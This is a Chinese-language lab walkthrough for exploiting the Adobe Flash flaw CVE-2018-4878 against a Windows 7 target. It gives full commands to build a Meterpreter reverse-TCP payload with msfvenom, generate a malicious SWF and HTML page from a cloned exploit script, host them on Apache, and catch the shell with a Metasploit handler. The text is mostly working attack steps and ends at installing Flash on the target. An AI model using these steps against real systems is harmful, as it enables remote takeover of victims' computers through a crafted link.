攻击者通过构造特殊的 Flash 链接, 当用户用浏览器/邮件/Office 访问此Flash 链接时, 会被“远程代码执行”, 并且直接被 getshell。
环境:
- 渗透机 Kali Linux ip:192.168.43.177
- 靶机 Windows 7 sp1 192.168.43.196
- exp: 来自
- flash: flashplayeractivex28.0.0.137.exe 下载地址链接: 密码:0li0
实验步骤
一、kali 使用 msfvenom 生成 shell 代码
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.177 lport=8888 -f python>shellcode.txt
msfvenom的用法可参考
下面是使用msfvenom的部分参数,是比较常用的-p 选择一个payload
-l 载荷列表 -f 生成的文件格式 -e 编码方式 -i 编码次数 -b 在生成的程序中避免出现的值 -x 允许我们指定一个自定义的可执行文件作为模板,也就是将木马捆绑到这个可执行文件上。 -h 帮助。
二、生成swf和html
git clone https://github.com/HuanWoWeiLan/SoftwareSystemSecurity-2019.git
使用上面生成的payload替换cve-2018-4878.py中的payload
更改输出文件路径
执行cve-2018-4878.py,会生成两个文件
python cve-2018-4878.py
开启apache,将生成的两个文件拷贝到/var/www/html中
service apache2 startcp index2.html /var/www/html/index2.htmlcp exploit.swf /var/www/html/exploit.swf
kali开启监听
#msfconsole启动msfconsole#使用handler监听模块 msf > use exploit/multi/handler #回弹一个tcp连接 msf exploit(handler) > set payload windows/meterpreter/reverse_tcp #设置kali渗透机的ip地址 msf exploit(handler) > set lhost 192.168.43.177#设置监听端口,这个需跟上面msfvenom设置的端口一致 msf exploit(handler) > set lport 8888 #开启监听,等待靶机上线 msf exploit(handler) > exploit
靶机安装adobe flash player